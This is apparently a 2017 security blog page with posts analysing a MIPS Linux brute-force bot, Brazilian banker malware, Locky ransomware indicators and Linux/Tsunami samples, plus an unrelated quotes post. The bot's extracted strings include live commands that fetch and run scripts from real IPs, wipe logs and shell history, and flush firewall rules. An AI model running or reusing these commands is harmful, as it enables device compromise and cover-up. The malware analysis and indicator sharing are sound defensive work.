Saturday, September 23, 2017

Quotes from Successful People

Albert Einstein


  • Imagination is more important than knowledge.
  • Insanity: doing the same thing over and over again and expecting different results.
  • No problem can be solved from the same level of consciousness that created it.
  • The important thing is not to stop questioning. Curiosity has its own reason for existing.
  • Life is like riding a bicycle. To keep your balance you must keep moving.
  • Two things are infinite: the universe and human stupidity; and I'm not sure about the universe.
  • Look deep into nature, and then you will understand everything better.
  • Try not to become a man of success, but rather try to become a man of value.
  • I have no special talents. I am only passionately curious.
  • Everything should be made as simple as possible, but not simpler.



Bill Gates


  • Life is not fair, get used to it (quite honest)
  • Success is a lousy teacher. It seduces smart people into thinking they can't lose.
  • If you can't make it good, at least make it look good.
  • I believe that if you show people the problems and you show them the solutions they will be moved to act.



Steve Jobs


  • Your time is limited, so don’t waste it living someone else’s life.
  • I want to put a ding in the universe.
  • We hire people who want to make the best things in the world.
  • Sometimes life is going to hit you in the head with a brick. Don't lose faith.
  • Being the richest man in the cemetery doesn't matter to me. Going to bed at night saying we've done something wonderful, that's what matters to me.
  • Sometimes when you innovate, you make mistakes. It is best to admit them quickly, and get on with improving your other innovations.
  • Design is not just what it looks like and feels like. Design is how it works.
  • Innovation distinguishes between a leader and a follower.



Mark ZuckerBerg


  • Done is better than perfect.
  • I think a simple rule of business is, if you do the things that are easier first, then you can actually make a lot of progress.



Jack Ma

See beyond your circumstances. No matter what your current condition, how or where you grew up, or what education or training you feel you lack, you can be successful in your chosen endeavour.


Henry Ford


  • Failure is the only opportunity to begin again more intelligently.
  • If you think you can do a thing or think you can't do a thing, you're right.
  • A business that makes nothing but money is a poor business.
  • Don't find fault, find a remedy.



Michael Jordan

Accept failure, but keep trying.


Walt Disney

Keep moving forward.


Muhammad Ali


  • I hated every minute of training, but I said, 'Don't quit. Suffer now and live the rest of your life as a champion.'
  • Don't count the days, make the days count.
  • He who is not courageous enough to take risks will accomplish nothing in life.
  • I am the greatest, I said that even before I knew I was.
  • If you even dream of beating me you'd better wake up and apologize.
  • I'm so fast that last night I turned off the light switch in my hotel room and was in bed before the room was dark.
  • The fight is won or lost far away from witnesses - behind the lines, in the gym, and out there on the road, long before I dance under those lights.


And success tips from Arnold Schwarzenegger


Post created for inspiring billions
by
newWorld

Saturday, September 9, 2017

Analysis of recent linux malware:

Today we received a linux malware sample for analysis.
MD5: 26413FD652A4ABB3FCA4A936DE6A4736

remnux@remnux:~/Downloads$ file ntpd
ntpd: ELF 32-bit MSB  executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped

This sample appears to be attacking bot. Let's look at the strings:

00000001D6A0   00000001D6A0      0   37.158.%d.%d
00000001D6B0   00000001D6B0      0   95.9.%d.%d
00000001D6BC   00000001D6BC      0   41.252.%d.%d
00000001D6CC   00000001D6CC      0   58.71.%d.%d
00000001D6D8   00000001D6D8      0   104.55.%d.%d
00000001D6E8   00000001D6E8      0   78.186.%d.%d
00000001D6F8   00000001D6F8      0   78.189.%d.%d
00000001D708   00000001D708      0   221.120.%d.%d
00000001D718   00000001D718      0   88.5.%d.%d
00000001D724   00000001D724      0   41.254.%d.%d
00000001D734   00000001D734      0   103.20.%d.%d
00000001D744   00000001D744      0   103.47.%d.%d
00000001D754   00000001D754      0   103.57.%d.%d
00000001D764   00000001D764      0   45.117.%d.%d
00000001D774   00000001D774      0   101.51.%d.%d
00000001D784   00000001D784      0   137.59.%d.%d
00000001D794   00000001D794      0   1.56.%d.%d
00000001D7A0   00000001D7A0      0   1.188.%d.%d
00000001D7AC   00000001D7AC      0   14.204.%d.%d
00000001D7BC   00000001D7BC      0   27.0.%d.%d
00000001D7C8   00000001D7C8      0   27.8.%d.%d
00000001D7D4   00000001D7D4      0   27.50.%d.%d
00000001D7E0   00000001D7E0      0   27.54.%d.%d
00000001D7EC   00000001D7EC      0   27.98.%d.%d
00000001D7F8   00000001D7F8      0   27.112.%d.%d
00000001D808   00000001D808      0   27.192.%d.%d
00000001D818   00000001D818      0   36.32.%d.%d
00000001D824   00000001D824      0   36.248.%d.%d
00000001D834   00000001D834      0   39.64.%d.%d
00000001D840   00000001D840      0   42.4.%d.%d
00000001D84C   00000001D84C      0   42.48.%d.%d
00000001D858   00000001D858      0   42.52.%d.%d
00000001D864   00000001D864      0   42.56.%d.%d
00000001D870   00000001D870      0   42.63.%d.%d
00000001D87C   00000001D87C      0   42.84.%d.%d
00000001D888   00000001D888      0   42.176.%d.%d

Other interesting strings:

00000001E289   00000001E289      0   [0;31mSuccessfully Bruteforced IP: 
00000001E2AD   00000001E2AD      0   [0;33m%s | 
00000001E2B9   00000001E2B9      0   [0;31mUsername: 
00000001E2CA   00000001E2CA      0   [0;33m%s | 
00000001E2D6   00000001E2D6      0   [0;31mPassword: 
00000001E2E7   00000001E2E7      0   [0;33m%s
00000001E2F4   00000001E2F4      0   REPORT %s:%s:%s
00000001E324   00000001E324      0   %s cd /var/; rm -rf tftp; wget http://89.38.96.67/tftp || tftp -r tftp -g 89.38.96.67; chmod 777 tftp; ./tftp; rm -rf tftp
00000001E3A8   00000001E3A8      0   cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.177.172.221/John.sh ; chmod 777 John.sh; sh John.sh; tftp 94.177.172.221 -c get tftp11.sh; chmod 777 tftp11.sh; sh tftp11.sh; tftp -r tftp22.sh -g 94.177.172.221; chmod 777 tftp22.sh; sh tftp22.sh; ftpget -v -u anonymous -p anonymous -P 21 94.177.172.221 ftp11.sh ftp11.sh; sh ftp11.sh; rm -rf John.sh tftp11.sh tftp22.sh ftp11.sh;rm -rf *;history -c
00000001E550   00000001E550      0   jackmy*
00000001E558   00000001E558      0   busybox*
00000001E574   00000001E574      0   tftp*
00000001E584   00000001E584      0   mipsel*
00000001E58C   00000001E58C      0   mips*
00000001E594   00000001E594      0   mips64*
00000001E59C   00000001E59C      0   i686*
00000001E5A4   00000001E5A4      0   sparc*
00000001E5BC   00000001E5BC      0   jackmeoff*
00000001E5C8   00000001E5C8      0   hackz*
00000001E5D0   00000001E5D0      0   bruv*
00000001E5E0   00000001E5E0      0   armv*
00000001E5E8   00000001E5E8      0   ntpd*
00000001E5F0   00000001E5F0      0   shitty*
00000001E5F8   00000001E5F8      0   jack*
00000001E618   00000001E618      0   mipsel
00000001E63C   00000001E63C      0   /dev/netslink/
00000001E64C   00000001E64C      0   /tmp/
00000001E654   00000001E654      0   /var/
00000001E65C   00000001E65C      0   /dev/
00000001E664   00000001E664      0   /var/run/
00000001E670   00000001E670      0   /dev/shm/
00000001E67C   00000001E67C      0   /mnt/
00000001E684   00000001E684      0   /boot/
00000001E68C   00000001E68C      0   /usr/
00000001E694   00000001E694      0   >%s.t && cd %s && for a in 
00000001E6B0   00000001E6B0      0   ls -a %s
00000001E6B9   00000001E6B9      0   ; do >$a; done; >retrieve ;echo ps aux >> proc ; pkill -9 %d
00000001E6F8   00000001E6F8      0   >%s.t && cd %s ; >retrieve
00000001E718   00000001E718      0   pkill -9 %s
00000001E728   00000001E728      0   rm -rf /tmp/* /var/* /var/run/* /var/tmp/*
00000001E754   00000001E754      0   rm -rf /var/log/wtmp
00000001E76C   00000001E76C      0   history -c;history -w
00000001E784   00000001E784      0   rm -rf /tmp/*
00000001E794   00000001E794      0   history -c
00000001E7A0   00000001E7A0      0   rm -rf ~/.bash_history
00000001E7B8   00000001E7B8      0   rm -rf /bin/netstat
00000001E7CC   00000001E7CC      0   history -w
00000001E7D8   00000001E7D8      0   pkill -9 busybox
00000001E7EC   00000001E7EC      0   pkill -9 perl
00000001E7FC   00000001E7FC      0   service iptables stop
00000001E814   00000001E814      0   /sbin/iptables -F;/sbin/iptables -X
00000001E838   00000001E838      0   close
00000001E840   00000001E840      0   keep-alive
00000001E84C   00000001E84C      0   accept
00000001E854   00000001E854      0   Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)
00000001E894   00000001E894      0   Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5
00000001E8D4   00000001E8D4      0   Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10
00000001E964   00000001E964      0   Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0
00000001E99C   00000001E99C      0   Opera/6.04 (Windows XP; U) [en]
00000001E9BC   00000001E9BC      0   Opera/9.99 (X11; U; sk)
00000001E9D4   00000001E9D4      0   Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5
00000001EA2C   00000001EA2C      0   Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc
00000001EACC   00000001EACC      0   Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk
00000001EB20   00000001EB20      0   Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41
00000001EB94   00000001EB94      0   Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)
00000001EBD4   00000001EBD4      0   Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
00000001EC8C   00000001EC8C      0   Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1
00000001ECE0   00000001ECE0      0   Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)
00000001ED38   00000001ED38      0   Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4
00000001ED90   00000001ED90      0   Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201
00000001EDD0   00000001EDD0      0   Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911
00000001EE18   00000001EE18      0   Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2
00000001EE70   00000001EE70      0   Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)
00000001EEDC   00000001EEDC      0   Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
00000001EF34   00000001EF34      0   Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7
00000001EF84   00000001EF84      0   Mozilla/5.0 (PLAYSTATION 3; 3.55)
00000001EFA8   00000001EFA8      0   Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2
00000001F004   00000001F004      0   wii libnup/1.0
00000001F014   00000001F014      0   Mozilla/4.0 (PSP (PlayStation Portable); 2.00)
00000001F044   00000001F044      0   PSP (PlayStation Portable); 2.00
00000001F068   00000001F068      0   Bunjalloo/0.7.6(Nintendo DS;U;en)
00000001F08C   00000001F08C      0   Doris/1.15 [en] (Symbian)
00000001F0A8   00000001F0A8      0   BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1
00000001F0E8   00000001F0E8      0   BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100findlinks/2.0.1 (+http://wortschatz.uni-leipzig.de/findlinks/)
00000001F174   00000001F174      0   findlinks/1.1.6-beta6 (+http://wortschatz.uni-leipzig.de/findlinks/)
00000001F1BC   00000001F1BC      0   findlinks/1.1.6-beta4 (+http://wortschatz.uni-leipzig.de/findlinks/)
00000001F204   00000001F204      0   findlinks/1.1.6-beta1 (+http://wortschatz.uni-leipzig.de/findlinks/)
00000001F24C   00000001F24C      0   findlinks/1.1.5-beta7 (+http://wortschatz.uni-leipzig.de/findlinks/)
00000001F294   00000001F294      0   Mozilla/5.0 (Windows; U; WinNT; en; rv:1.0.2) Gecko/20030311 Beonex/0.8.2-stable
00000001F2E8   00000001F2E8      0   Mozilla/5.0 (Windows; U; WinNT; en; Preview) Gecko/20020603 Beonex/0.8-stable
00000001F338   00000001F338      0   Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2 (Debian-1.99+2.0b2+dfsg-1)
00000001F3A4   00000001F3A4      0   Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2
00000001F3F8   00000001F3F8      0   Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b2) Gecko/20060826 BonEcho/2.0b2
00000001F454   00000001F454      0   Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1b2) Gecko/20060831 BonEcho/2.0b2
00000001F4B0   00000001F4B0      0   Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.1b1) Gecko/20060601 BonEcho/2.0b1 (Ubuntu-edgy)
00000001F514   00000001F514      0   Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a3) Gecko/20060526 BonEcho/2.0a3
00000001F570   00000001F570      0   Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2
00000001F5CC   00000001F5CC      0   Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2
00000001F628   00000001F628      0   Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2
00000001F688   00000001F688      0   AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)
00000001F6D0   00000001F6D0      0   AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)
00000001F768   00000001F768      0   AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)
00000001F7B4   00000001F7B4      0   AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)
00000001F800   00000001F800      0   AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)
00000001F850   00000001F850      0   AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)
00000001F898   00000001F898      0   AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)
00000001F8EC   00000001F8EC      0   AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)
00000001F93C   00000001F93C      0   AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)
00000001F984   00000001F984      0   AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)
00000001F9D0   00000001F9D0      0   AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)
00000001FA1C   00000001FA1C      0   magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)
00000001FA64   00000001FA64      0   Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)
00000001FAB4   00000001FAB4      0   Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)
00000001FB04   00000001FB04      0   MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)
00000001FB38   00000001FB38      0   MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)
00000001FB6C   00000001FB6C      0   Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)
00000001FBB4   00000001FBB4      0   %s %s HTTP/1.1
00000001FBC4   00000001FBC4      0   Connection: %s
00000001FBD4   00000001FBD4      0   Accept: */*
00000001FBE1   00000001FBE1      0   User-Agent: %s
00000001FBF4   00000001FBF4      0   arfgG
00000001FBFC   00000001FBFC      0   HBiug655
00000001FC08   00000001FC08      0   KJYDFyljf754
00000001FC18   00000001FC18      0   LIKUGilkut769458905
00000001FC2C   00000001FC2C      0   JHFDSkgfc5747694
00000001FC40   00000001FC40      0   GJjyur67458
00000001FC4C   00000001FC4C      0   RYSDk747586
00000001FC58   00000001FC58      0   HKJGi5r8675
00000001FC64   00000001FC64      0   KHGK7985i
00000001FC70   00000001FC70      0   yuituiILYF
00000001FC7C   00000001FC7C      0   GKJDghfcjkgd4
00000001FC8C   00000001FC8C      0   uygtfgtrevf
00000001FC98   00000001FC98      0   tyeuhygbtfvg
00000001FCA8   00000001FCA8      0   ewqdcftr
00000001FCB4   00000001FCB4      0   trbazetghhnbrty
00000001FCC4   00000001FCC4      0   tbhrwsehbg
00000001FCD0   00000001FCD0      0   twehgbferhb
00000001FCDC   00000001FCDC      0   etrbhhgetrb
00000001FCE8   00000001FCE8      0   edfverthbyrtb
00000001FCF8   00000001FCF8      0   kmiujmnhnhfgn
00000001FD08   00000001FD08      0   zcdbvgdfsbgfd

Post made by

Analysis of Brazilian Banker malware

Executive summary
Brazilian banker malware is one of the popular banking malware which targets South America and referred by malware researchers as SA-Banker or Brazilian Banker. Many campaigns were used by malware actors to reach the victim and lure them to give their credentials in the application. Once the fake application get the banking credentials which will be acquired by the malware authors. Last week, we got the attention of banking malware which uses campaigns using Facebook’s content delivery network (CDN).
Campaign using FB CDN:

Security researchers worried on the latest campaign using Facebook’s CDN so it makes harder for the security products to block.

Figure 1 CDN used in Brazilian banking malware
The last week data from malware hunter team says that around 200 thousand people opened the email from Brazil. Refer the following image from malware hunter team:

Figure 2 Email Infection stats

Our researchers dig deeper and get the malware samples for analysis. This is purely targeted on Brazil banking customers.
Analysis
File MD5: 76E3E02AD689AF06699205D5BE956894
Size of the file: 752 KB

Figure 3 File submission

This sample was submitted to the system, two days back only and like we said the origin or source of the submission is Brazil. And the file type is dll.

Figure 4 Banker detection
We load the sample to PEid for checking the export details.
Figure 5 Export details of the malware sample
Further analysis will be published in the next post.

Post by


Wednesday, September 6, 2017

Locky download links for analysis (Pastebin link)

In our last postLocky Ransomware Latest Infection - Indicator of Compromise: (http://www.edison-newworld.com/2017/09/locky-ransomware-latest-infection.html) we posted the details of IOC - indicator of compromise of famous Locky ransomware. Security researchers added few more details in the following pastebin link:

https://pastebin.com/8esSAWFD

You can visit and get the links. But we copied those links as image.

Note: This is purely for research purpose and malware analysis purpose - Not for abusing this.

https://www.virustotal.com/en/file/907f65e8a56dbd6328175c924987218d1d5e2eb144222f5fe5d1c52ad2647773/analysis/1504691819/
https://www.virustotal.com/en/file/045d4930f2d37a12d9a3b5725c777cd7b4ecdeffa2f6138809d2a12e42570f9f/analysis/1504691826/
https://www.virustotal.com/en/file/e75e5d374f20c386b1114252647cca7bd407190cafb26c6cfbd42c5f9223fe6c/analysis/1504691837/
https://www.virustotal.com/en/file/3ac9ab7ddd73531c3d5b7438f6bb74a7711c7f523770d61c338da4664993e7b1/analysis/1504691850/
https://www.virustotal.com/en/file/e6ddca65b517362123dfab0961f0735d738b7b3309568d021c533f1b19073666/analysis/150469188

                                                                          Locky urls                                                                                                                                                            
Raw links locky

Post made by
newWorld researchers

Tuesday, September 5, 2017

Locky Ransomware Latest Infection - Indicator of Compromise:

IOC for latest locky ransomware infection:

Locky Infection URL:

hxxp://konferencjaora[.]pl/w/523f.php
hxxp://autonikos[.]pl/w/6dty.php
hxxp://oxfordschoolkotputli[.]com/w/vait.php
hxxp://j3[.]rodolfogn[.]com/w/qn0b.php
hxxp://martinagebhardt[.]hu/w/uol4.php

Regex created for this php file is \/w\/[0-9a-z]{4}\.php.

Fake Dropbox landing page which serve locky ransomware:

Fake Dropbox link in the mail


hxxp://albion-cx22.co[.]uk/dropbox.html
hxxp://ambrogiauto[.]com/dropbox.html
hxxp://arthurdenniswilliams[.]com/dropbox.html
hxxp://autoecoleathena[.]com/dropbox.html
hxxp://autoecoleboisdesroches[.]com/dropbox.html
hxxp://autoecoledufrene[.]com/dropbox.html
hxxp://avtokhim[.]ru/dropbox.html
hxxp://bayimpex[.]be/dropbox.html
hxxp://binarycousins[.]com/dropbox.html
hxxp://charleskeener[.]com/dropbox.html
hxxp://campusvoltaire[.]com/dropbox.html
hxxp://dar-alataa[.]com/dropbox.html
hxxp://flooringforyou.co[.]uk/dropbox.html
hxxp://gestionale-orbit[.]it/dropbox.html
hxxp://griffithphoto[.]com/dropbox.html
hxxp://jakuboweb[.]com/dropbox.html
hxxp://jaysonmorrison[.]com/dropbox.html
hxxp://patrickreeves[.]com/dropbox.html
hxxp://potamitis[.]gr/dropbox.html
hxxp://tasgetiren[.]com/dropbox.html
hxxp://willemshoeck[.]nl/dropbox.html

Fake Dropbox landing page
It is advised to block these malicious url in the firewall, if you find any of these urls in your proxy logs or firewall that it is an indication of your system has been infected.

Post made by
newWorld researchers


Sunday, September 3, 2017

Linux/Tsunami Malware Captured from honeypot

Today we got a shell file which was captured from honeypot and submitted to VT. We checked the detection for that file and flagged as Linux/Tsunami.NJH. We directly look in to the contents of shell script and it is generic downloader as it seem.
Figure 1 Linux/Tsunami.NJH
 The script contains same IP address throughout the file: 46.218.149(.)85. We checked this IP address with those file directories in VT and it actually download malicious ELF file. We moved to the detection page and it got similar hits where Eset detects it as a variant of Linux/Tsunami.NCD. The family description for this variant says that it is a backdoor and can be controlled remotely. The main purpose of this malware is to download other malware files from the server, DDoS attack and shell command execution.

Downloaded files - analysis

Based on the details, we manually downloaded the important files and started our analysis. We started with the string analysis of these file to get any idea. All the three files which we downloaded have junk strings. And there is two line of strings which at least look like a Japanese words. Refer the below snapshot:

Figure 2 Strings of all the three files

·         0000000A5069   0000000A5069    nandemo shiranai wa yo,
·         0000000A5084   0000000A5084                    shitteru koto dake

String analysis – Based on Google search results

When we read that string it spell like Japanese words, we need to check in google. Yes it is Japanese word and it means “I don’t know anything” and “only I know”. But the plain google search leads to some interesting posts like funtime ninja codes and DDoS router malware.


Figure 3 Funtimes Ninja Malware

TFTP is a protocol for transferring data servers use to boot diskless workstations, X-terminals, and routers by using User Data Protocol (UDP). TFTP was primarily designed to read or write files by using a remote server. Here busybox is found in all the loops. It giving a hint that it could attack on limited resource linux machine (aka linux on embedded systems).

Let’s move on to the next one DDoS router malware article where we found the following yara rule to detect the presence of router DDoS malware:

import “elf”
rule STD
{
 meta:
 author = “Akamai SIRT”
 description = “Kaiten/STD DDoS malware”
 strings:
 $s0 = “shitteru koto dake”
 $s1 = “nandemo wa shiranai wa yo,”
 condition:
 elf.number_of_sections == 0 and
 elf.number_of_segments == 2 and
 $s0 and $s1
}

This yara rule was created by researchers from Akamai for Kaiten/STD router DDoS malware.

Figure 4 DDoS Campaign
The above graph is from Akamai on the DDoS campaign from different locations across the globe.

Static analysis of the downloaded files

We ran the file command to check the file properties of these files, and resulted as valid elf file.

Figure 5 File command elf

Figure 6 ELF Header
When we try to disassemble these files we are facing following warnings:
·         Warning: read (shdr) at 0xffff
·         Warning: Cannot initialize section headers
·         Warning: Cannot initialize strings table

Using the initial script, tweaked few lines related to download, now it’s throwing error as exec format error.
Figure 7 Execution error
Conclusion

Based on the AV detection and string analysis, these files are found to be backdoor with DDoS functionalities. It is highly recommended to block the malicious IP address in the firewall and proxy. A good SOC with better threat intelligence feed will minimise the attack and even stop the attack before it creates any damage.


Research done by

Four New Assassin's Creed Game

  Assassin's creed Mirage protagonist Basim AKA LOKI Game happening in Baghdad 20 years before Assassin's creed Valhalla basically g...